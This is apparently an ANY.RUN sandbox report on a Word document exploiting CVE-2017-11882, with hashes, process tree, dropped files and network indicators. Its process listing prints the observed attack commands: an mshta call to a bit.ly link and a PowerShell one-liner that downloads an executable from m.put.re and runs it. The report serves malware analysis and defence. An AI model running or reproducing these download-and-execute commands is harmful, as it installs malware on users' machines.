analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2dd76e9ca36e3c84d86abea4716f1c40c03c5f50a1bb19967444d449252a9290

Full analysis: https://app.any.run/tasks/57dd4009-6448-44be-9351-feb0e266d0b3
Verdict: Malicious activity
Analysis date: October 14, 2019, 14:42:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: application/octet-stream
File info: data
MD5:

CC8B01D7C2E16690A6F7598AB17D49BC

SHA1:

29EAD856EBEC87F547E4308A54A3E6411A636F8F

SHA256:

2DD76E9CA36E3C84D86ABEA4716F1C40C03C5F50A1BB19967444D449252A9290

SSDEEP:

1536:nssIAnJiYC8tJxdHoP13Gm+xaARjhK1pFxU7f6m9mJm6m5mzmMmWmOmHmDmhmG:n+AJiYC8x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 328)
    • Changes settings of System certificates

      • mshta.exe (PID: 3508)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1764)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 328)
    • Starts Microsoft Office Application

      • rundll32.exe (PID: 920)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3508)
    • Creates files in the user directory

      • mshta.exe (PID: 3508)
      • powershell.exe (PID: 2856)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 328)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3508)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2648)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2648)
    • Reads internet explorer settings

      • mshta.exe (PID: 3508)
    • Application was crashed

      • EQNEDT32.EXE (PID: 328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs winword.exe no specs eqnedt32.exe mshta.exe cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
920"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\2dd76e9ca36e3c84d86abea4716f1c40c03c5f50a1bb19967444d449252a9290C:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2648"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2dd76e9ca36e3c84d86abea4716f1c40c03c5f50a1bb19967444d449252a9290"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
328"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3508mshta http://bit.ly/2pkH4Ck &AAAAAAAAAAAAAAA CC:\Windows\system32\mshta.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1764"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://m.put.re/tMRdRdSU.exe','%temp%\naval.exe'); Start '%temp%\naval.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2856powershell (new-object System.Net.WebClienT).DownloadFile('https://m.put.re/tMRdRdSU.exe','C:\Users\admin\AppData\Local\Temp\naval.exe'); Start 'C:\Users\admin\AppData\Local\Temp\naval.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 036
Read events
1 765
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
3
Unknown types
3

Dropped files

PID
Process
Filename
Type
2648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR384C.tmp.cvr
MD5:
SHA256:
3508mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
MD5:
SHA256:
2856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZTI8O1GN53J19YL4318Q.temp
MD5:
SHA256:
2648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A3BD7097-BEF7-4C4A-9512-9700531B2B5B}.tmp
MD5:
SHA256:
2648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DD66F1B0-EEBA-459E-9D0E-0995773DADFC}.tmp
MD5:
SHA256:
2648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{544A9123-4D0B-4245-9543-1A7FCEC2DF33}.tmp
MD5:
SHA256:
3508mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txttext
MD5:1ABE627BC0583505CE632E4624CF1EA0
SHA256:0D9194F5AE62211542A518AC0C3AD79E7EDA8E6F2C6057857B836FA5AE6C3836
2648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:137E4A659A2D954CB034DE2767B02B0F
SHA256:182FB39860732B7CD28DE0CF74DBE9525588DA8A03A215296D4B70C485C32A9C
2856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3a74f7.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3508
mshta.exe
GET
301
67.199.248.10:80
http://bit.ly/2pkH4Ck
US
html
116 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3508
mshta.exe
67.199.248.10:80
bit.ly
Bitly Inc
US
shared
2856
powershell.exe
104.27.142.252:443
m.put.re
Cloudflare Inc
US
shared
3508
mshta.exe
5.79.72.163:443
u.teknik.io
LeaseWeb Netherlands B.V.
NL
malicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.10
  • 67.199.248.11
shared
u.teknik.io
  • 5.79.72.163
whitelisted
m.put.re
  • 104.27.142.252
  • 104.27.143.252
suspicious

Threats

PID
Process
Class
Message
3508
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info